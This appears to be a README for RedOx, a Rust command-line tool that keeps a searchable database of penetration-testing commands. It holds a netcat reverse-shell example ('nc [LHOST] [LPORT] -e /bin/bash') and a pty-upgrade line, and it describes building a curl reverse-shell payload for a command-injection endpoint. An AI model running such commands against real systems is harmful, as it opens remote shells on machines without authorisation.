RTFM-RedOx CLI Hacking Tool
This is a tool I wrote in Rust that is an updated CLI version of the python tool RTFM. I’m still new to Rust so I will be refactoring the code as I become familiar with the optimal way to write a Rust application. RedOx is currently using RTFM’s database, which I’m gradually updating with new commands and pushing to the git repository as I use the tool myself.
list of current commands
Ctrl+r Enter quick search mode to dynamically find commands as you type.
Ctrl+c Copy currently selected command to clipboard.
Ctrl+u URL-encode and then copy currently selected command to clipboard.
Crtl+h or hist Display selectable history of already selected commands.
Ctrl+v Paste from clipboard
info Display info on the currently selected command.
env Show user variables that have already been set.
add -c Add a command to the database e.g. 'add -c nc [LHOST] [LPORT] -e /bin/bash'
update Update a database column in the selected command
e.g. comment, command, author or references
Example: update references http://blog.gregscharf.com
Esc Exit current mode.
help Display help
Ctrl+q or exit Exit redOx.
Below is a terminal capture that highlights RedOx’s usage. It’s an example of building a curl command that contains a bash reverse shell to interact with a php endpoint that is vulnerable to remote code execution via command injection. Typically this would require going to my notes or maybe a website for specific command syntax that I might not quite remember, maybe using Cyber Chef or Burp to url encode the payload, getting a reverse shell one liner from my notes or from Rev Shells for the payload, and then once I get a shell, typing `python3 -c “import pty;pty.spawn('/bin/bash’);” to get a proper pty. It’s especially useful for any syntax that isn’t already in my terminal history that I would ordinarily retrieve through a Crtl+r search or via the bash-autocompletion zsh plugin I use. Although the database does contain quite a lot of that syntax as well, which can be useful in certain situations. Each command also has one or more reference links to a video or web content explaining what the command does.
